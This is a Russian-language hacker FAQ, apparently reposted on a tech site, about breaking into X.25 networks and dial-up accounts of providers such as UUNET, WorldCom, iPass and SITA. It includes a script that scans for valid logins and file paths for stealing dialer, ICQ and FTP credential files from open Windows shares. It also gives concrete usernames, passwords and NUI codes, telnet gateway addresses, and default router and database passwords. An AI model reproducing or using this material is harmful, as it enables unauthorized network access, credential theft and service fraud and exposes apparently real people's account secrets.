A.Сканировать с терминала - это вчерашний день. Добудьте где-нибудь шелл и сканируйте с него через ip гейт. Кроме того, необходимо достать программу-сканер. Perl и всякие там expect'ы - довольно тормозная вещь, поэтому опитмальный вариант - это реализация многопоточности на си или то же самое через nonblocking sockets (хрен знает есть ли такое)  - сканер uunet на си updated: а вот как сканили раньше... Скрипт morgoth'а, вечная ему память.
------- begin
; for scan CompuserveNetwork's hostnames
; v1.4 x25morgoth@mailru.com


OPENREAD hosts.txt
SEARCH
start:
TRANSMIT "@D^M"
WAITFOR "TERMINAL=" , 20
TRANSMIT "d1^M"
WAITFOR "@" , 20

con:
TRANSMIT "202202E^M"
WAITFOR "Name:" , 20
con0:
TRANSMIT "%LOGIN%/new^M"
WAIT "Name:|UIC:|@|}|onnected to|assword:|error|not allowed" ,40
CHECK "Name:" , con1
CHECK "UIC:" , con2
CHECK "@" , con1
CHECK "}" , found
CHECK "onnected to" ,con6
CHECK "assword:" ,con5
CHECK "error" ,con6
CHECK "not allowed" ,con6


con1:
READRECORD
goto con0

con2:
TRANSMIT "%LOGIN%^M"
WAIT "assword:|UIC:|@|}|onnected to|error|not allowed" , 40
CHECK "assword:" , con3
CHECK "UIC:" , con4
CHECK "@" , tryagain
CHECK "}" , found
CHECK "onnected to" ,con6
CHECK "error" ,con6
CHECK "not allowed" ,con6

con3:
TRANSMIT "%LOGIN%^M"
WAIT "assword:|@|}" , 40
CHECK "assword:" , con3
CHECK "@" , tryagain
CHECK "}" , found

con4:
SAVEFOUND
goto con2

con5:
SAVEFOUND
goto con3

con6:
SAVEFOUND
READRECORD
goto con7a
con7:
TRANSMIT "guest^M"
con7a:
WAIT "Name:|ASSCODE:|assword:|sername:|ogin:|ID|@" ,90
CHECK "Name:" , con0
CHECK "ASSCODE:" , con7
CHECK "assword:" , con7
CHECK "sername:" , con7
CHECK "ogin:" , con7
CHECK "ID" , con7
CHECK "@" , try2

found:
SAVEFOUND ; save login, seems to be valid, in ultra.fnd
WAITFOR "@" , 90
goto tryagain

tryagain:
READRECORD
try2:
goto con
----- end


Q. Как достать uic и password?
A.Аккаунты ко всему достаются путем сканирования на открытые шары, и uunet тут не исключение. Другое дело, что подобные аккаунты хрянятся не где обычно (PWL),а в конфигурационных файлах программы доступа к конкретной сети. Для этого необходимо скачать соответствующую программу доступа, изучить где она хранит данные о пользователе, и тянуть с шар этот файл, потом у себя скормить спертый файл программе доступа если кто-нибудь еще не подсуетился и не написал расшифровщик, и выбить из неё необходимые данные (с помощью например все того же openpass'a)
Программа доступа для uunet называется phone access lookup.Имеется и расшифровщик конфигов, написанный barvinok.

updated: х..ли шифровать, и так все знают =) \progra~1\pal\pal.ini оно как правило лежит =)
(или \progra~1\pal95\pal95.ini или... возможны варианты)
updated: многие вот жалуются, что мол нету нигде этих pal.ini. Hint: на всем известных диапазонах (212.211. и т.д.) на win95-машинах эти файлы мне почему-то попадались крайне редко.


Q. Как мне использовать закрытые для России аккаунты worldcom?
A.Cуществует много вариаций, например:
1)exec shell циски на каком-нибудь из хостов к которым доступ разрешен.
Попав туда набираем: pad 2111855, или pad 3132 (или pad 31329 - точно не помню).
А может, циска уже имеет доступ в инет и можно подсоединиться к telnet гейту набрав скажем telnet 212.211.79.137 4145. В некоторых случаях вам может понадобится установить второе ppp соединение, о чем уже до фига писалось. отсылаю всех к статье eadle
2)попробовать через грик (некоторые домены имеют роуминг по умолчанию.
например таким был @hp.com (hostname hpco), но из-за наплыва халявщиков недавно был закрыт. Однако таких доменов еще немеряно)
3)выходя в уунет через какие-нибудь левые сети (но тут как я писал раньше нужен NUI)
updated: всё равно это уже стало народным достоянием, так что и рассказать об этом не грех. Практически все подобные аккаунты можно использовать через хост wcdial с паролем sr1p.hpf или же запуская ppp не дожидаясь приглашения host name:, то есть скажем не жимкая в РОЛе после захода под dial@uupops.net:
proc main
waitfor "ogin:"
transmit "dial@uupops.net^M"
waitfor "word:"
transmit "dial@uupops.net^M"
endproc
Так можно использовать почти все логины, найденные на ворлдкомовсих диапазонах и не только ;). В pal.ini они как правило хранятся в параметах host_user или
host_pw:
Info #0 : host_user=m00108415@hp.com
Info #1 : host_pw=28Faz6m7
тогда как следующее - для использования через x.25:
Info #0 : HostName=hpco
Info #1 : UserID=m00108415
Info #2 : Password=28Faz6m7
 


Q. Как установить второе ppp соединение под *nix?
A.Hужно воспользоваться программой которая может перенаправлять свой ввод и вывод на виртуальный терминал (pty) и настроить pppd на работу с этим самым pty. Пример таких программ - modemu (читаем ее документацию), pty-redir (читаем VPN-howto или mini-howto, не помню уже. там все показано на примере, правда не pppd а ssh)


Q. Какие домены грика до сих пор работают? как мне включить роуминг на [domain]?
A.Работающих (не закрытых для России) доменов осталось очень мало, поэтому ясное дело никто не хочет их светить. попробуйте поискать сами =) список всех провайдеров входящих в консорциум .
Точно также и с включением роуминга - просто там никто не скажет, ищите на сайте провадера сами.
updated. Сейчас с включением роуминга на Россию стало вообще тяжело - по умолчанию его уже не делает вроде никто, и сделать его очень тяжело.


Q. Как узнать ip-диапазоны dialup'а буржуйского провайдера [kewlprovider]?
Я делал очень просто - заходил на irc в очень многопосещаемый канал (типа #usa , или #japan когда речь шла о каком нибудь ocn.ne.jp =)) и просто там висел. Потом просматривая логи joins/parts, можно было видеть что нибудь типа:* ivangovnov (govnov@line111.dial.kewlprovider.com) has joined #usa то что нам и надо.
updated. Оказывается даже после этого люди не могут найти эту галку =)
А я уже и вспомнить не могу, где ее когда-то ставил. По моему это в категории IRC не выбирая подкатегорию ставим show addresses и убираем short joins/parts


Q. Можно ли использовать аккаунты грика через x.25 сети?
A.Интересующихся этим вопросом советую скачать GRICdial, там есть довольно интересный скриптик =)
updated: не поленился скачать и вырезать из него то что надо
proc main
transmit "...^M"
waitfor "SITA NETWORK"
transmit "NUI 28700001^M"
waitfor "password"
transmit "H1VW9R^M"
waitfor "active"
transmit "2124172001^M"
waitfor "connected"
endproc
раньше было NUI 51290001 pass fcifhn - сейчас вроде как оно не работает


Q. Как использовать через x.25 аккаунты equant, не работающие на прямых пулах?
A.Можно попробовать (через SITA NETWORK):
NUI 77630001 pass 95p6ip NUA 9003157001 //updated -- этот nui вроде как не пашет
NUI 06040091,pass rffc3r NUA 4444769001 2315777001 2164693002
NUI 95600001,pass ddsmwf NUA 9003153001 9003154001 и тд
updated: ещё пробуйте nui 22421028 pass x4cfuo, nui 79900001 pass 1rg0fv


Q. Как использовать аккаунты AT&T?
A.Раньше работало следующее:
Через IBMNET:
proc main
transmit "*CLR"
waitfor "Please Sign-on:"
transmit "123456890@worldnet.ics-cug.att.net^M"
waitfor "Password:"
transmit "569365964^M" - может быть любым.
waitfor "Please Sign-on:"
transmit "ваш аккаунт AT&T,ваш пароль AT&T"
waitfor "}"
endproc
Через INFONET:
proc main
waitfor "ogin:"
transmit "wvpn03*xwnet04^M"
waitfor "assword:"
transmit "wvpn03oz^M"
waitfor "connected"
transmit "^M"
endproc
Сейчас для аккаунтов @worldnet.att.net это вроде не работает (?)
Аккаунты же вида @nbn1.newyorklife.com.ics-ip.att.net можно использовать через инфонет без скрипта, на ibmnet не пробовалось.
updated. Думаю что эту инфу можно уже выкинуть, но... пусть будет на память =)


Q. Как узнать адреса DNS серверов для провайдера [kewlprovider]?
A.Как правило если при установлении ppp соединения удаленная сторона не сообщает вас адреса dns, то в принципе в свойстве соединения можно прописать адреса любых dns серверов. Если все-таки нужны адреса обслуживающие конкретный домен, то:
запускаем nslookup
говорим ей set type=ns
и после этого вводим домен для которого надо узнать адреса, например rosnet.ru


Q. Можно ли использовать аккаунты МТУ не в Москве?
A.В Роснете есть (был?) ppp вход в МТУ Посмотрите nua 600814055 600290504 или поищите по старым публикациям про роснет.
updated: появился и пул в Питере - 3801108


Q. Есть ли гейт inet->[любая x.25 сеть]?
A.В любую x.25 сеть из инета можно попасть через диалаут, которые иногда встречаются на просторах сети (как их искать - читай статью в x25zine#1) без диалаута можно попасть например сюда:
telnet 194.186.138.131 (rol)
telnet 212.211.79.137 4145 (uunet)
telnet x25pad.autonet.net (autonet)
telnet lon.telnet.ja.net (janet)
telnet 192.156.137.139 2600 (вроде SITA)
telnet 194.67.8.161 8099 (SOVAMNET)


Q. Как использовать в России аккаунты ipass?
A.Через РОЛ, добавляя перед логином "IPASS/". например:
IPASS/000066638963044478010#0014@t-online.de
updated. Так уже я думаю хрен вы заюзаете потому что вроде как поставили ограничение на количество подобных входов и теперь все время выкидывает с rad_fss_reply() (в отличие от cu_reply() что значит по данному аккаунту уже кто-то сидит).
Но некоторые аккаунты до сих пор можно использовать через ситу:
nui 37830001 pass 98Z8VJ nua 9001252001 - это "родная" информация, тут возможны варианты.
а вообще вот вам кусок вроде как официальной документации от ipass, вот и разбирайтесь:
Script: sci-w95.scp, Platform: w95
; REV: SZ/2-03-97
; Main entry point to script
;
proc main
integer nTries = 3
delay 2
while nTries > 0 do
transmit "...^M"
waitfor "SITA NETWORK" then DoLogin until 5
nTries = nTries -1
endwhile
; timed out
goto Abort
DoLogin:
delay 2
transmit "NUI 06790263^M"
waitfor "password"
delay 2
transmit "ZERTYB^M"
waitfor "active"
delay 1
transmit "2123140001^M"
waitfor "connected"
goto Done
Abort:
; allow manual completion
set screen keyboard on
halt
Done:
endproc

Script: oze-w95.scp, Platform: w95
-----------------------------------------------------------------
proc main
delay 2
transmit "^M"
waitfor "ervice?"
transmit "P"
transmit "^M"
waitfor "sername:"
transmit $USERID
transmit "^M"
waitfor "assword:"
transmit $PASSWORD
transmit "^M"
delay 2
endproc

Script: uun-w95.scp, Platform: w95
-----------------------------------------------------------------
proc main
integer count = 0
transmit "^M"
delay 1
transmit "^M"
delay 1
transmit "^M"
delay 1
while count < 5 do
transmit "^M"
waitfor "Login:" until 2
if $SUCCESS then
goto DoLogin
endif
count = count + 1
endwhile
halt
DoLogin:
transmit "IPASS/" + $USERID + "^M"
waitfor "Password:"
transmit $PASSWORD + "^M"
waitfor "ppp"
endproc

Script: voy-w95.scp, Platform: w95
-----------------------------------------------------------------
proc main
transmit "^M"
waitfor "service?"
transmit "ppp"
transmit "^M"
waitfor "sername:"
transmit
transmit "^M"
waitfor "assword:"
transmit
transmit "^M"
waitfor "witching"
endproc


updated 23. А где их взять, эти аккаунты ipass?
A.мне они часто попадались на всё том же любимом диапазоне wcom'a:
файл \progra~1\ipass\ipassco~1\userpref.ini, для извлекания пароля - тянем  ipassconnect


updated 24. Вот сканерю я, а какие файлы обычно люди с шар тянут?
A. аськины uinы:
\progra~1\icq\2000a\??????.uin
\progra~1\icq\2000b\??????.uin и так далее
конфиги диалеров, например \windows\edialer.ini
\progra~1\ipass\ipassco~1\userpref.ini - ipass
\progra~1\ipass\ipassco~1\ipass.ini - ipass
\progra~1\at&t\wns\user\account.* - at&t dialer, как его там
конфиги ftp клиентов, типа \progra~1\ws_ftp\ws_ftp.ini - там часто можно
обнаружить аккаунт на шелл
ну и про *.pwl и system.ini и так все знают


updated 25. как найти dialout?
A. про это было написано в x25zine#1. вкратце - открытые модемы в основном висят на портах 2001-2012. сканим и ищем =) а еще бывает на 4001-4012 или 6001-6012.
updated 26. Дайте мне диапазоны где сидят диалапщики hp.com, kpmg.com и т.д
A. Нет у них своих диапазонов, потому что это - не провайдеры, а компании занимающиеся более другими делами, а в инете их работники или кто они там, эти люди с аккаунтами, сидят через worldcom, так что и искать их надо там.


updated 27. Как по ситовскому nua определить местоположение?
A. формат адреса:
2 XX X YYY
XXX - код страны, например 270 - Россия.


updated 28. Какие есть пароли по умолчанию на всякие там роутеры?
A.вот некоторые из них (собранные вроде cyberliric'ом)
------
default passwords for BayNetworks equipment
routers(AN AHN ARN) - no passwords as default
workgroup switches - login:Manager
manager/manager
security/security
monitor/monitor

default CISCO routers
password: cisco
(works on 20-30% of hosts )

On 3Com products try SuperStack as password

Security Vulnerability in Motorola CableRouters
The CableRouter leaves an open telnet port at port 1024.
Furthermore, the CableRouter performs absolutely NO logging of
connections - you can connect and never be seen.
Login: cablecom
Password: router

defaul account for many old unixes:
login: sync
with no password
(can be used with LDPRELOAD exploit)

Default Account for MS SQL Server
Username: sa
with no password

InterBase default account
SYSDBA/MASTERKEY

Novell Netware
default accounts - SUPERVISOR, GUEST,
and Netware 4.x has ADMIN and USER_TEMPLATE as well.
All of these have no password to start with.
-----


updated 29. А я слышал, что можно коннектиться к compuserve через Петерлинк
A.У них на сайте лежат скрипты для WinCIM'а но я их не изучал.


updated 30. А как находить расшаренные диски? у меня сканер ничего не находит
A.Это наверное вопрос номер 1 на всех форумах =) хоть он тут и не очень в тему ответим.
Чтобы правильно работал сканер надобно:
чтобы в свойствах соединения с инетом стояла галка "вход в сеть"и были установлены следующие компоненты:
протокол tcp/ip и "контроллер удаленного доступа" (естественно)
клиент для сетей microsoft
и (вроде бы) протокол NetBEUI


updated 31. А некоторые диалеры типа GRICdial хранят всю информацию в реестре.Что делать?
A.Подмонтировать диск и заюзать Registry Viewer - тогда можно будет обойтись без скачиавния всего реестра.

seo & website usability html os faq hardware faq memory video cpu hdd mainboard faq printer & scaner modem mobiles hackzone

Магазин цифровой техники | Новинки магазина | Windows7: Общие настройки | Windows7: Реестр | Windows7: Реестр faq | Windows7: Настроки сети | Windows7: Безопасность | Windows7: Брандмауэр | Windows7: Режим совместимости | Windows7: Пароль администратора |  |  |  |  |  |  | Память | SDRAM | DDR2 | DDR3 | Quad Band Memory (QBM) | SRAM | RDRAM | FeRAM | Словарь терминов | Video | nVIDIA faq | ATI faq  | Интегрированное видео faq | TV tuners faq | Терминология | Форматы графических файлов | Работа с цифровым видео(faq) | Кодеки faq | DVD faq | DigitalVideo faq | Video faq (Архив) | CPU | HDD & Flash faq | Как уберечь винчестер | HDD faq | Cable faq | SCSI адаптеры & faq | SSD | Mainboard faq | Printer & Scaner | Горячая линия бесплатной юридической консультации | Благотворительность

На главную | Cookie policy | Sitemap

 

po gonn © 2004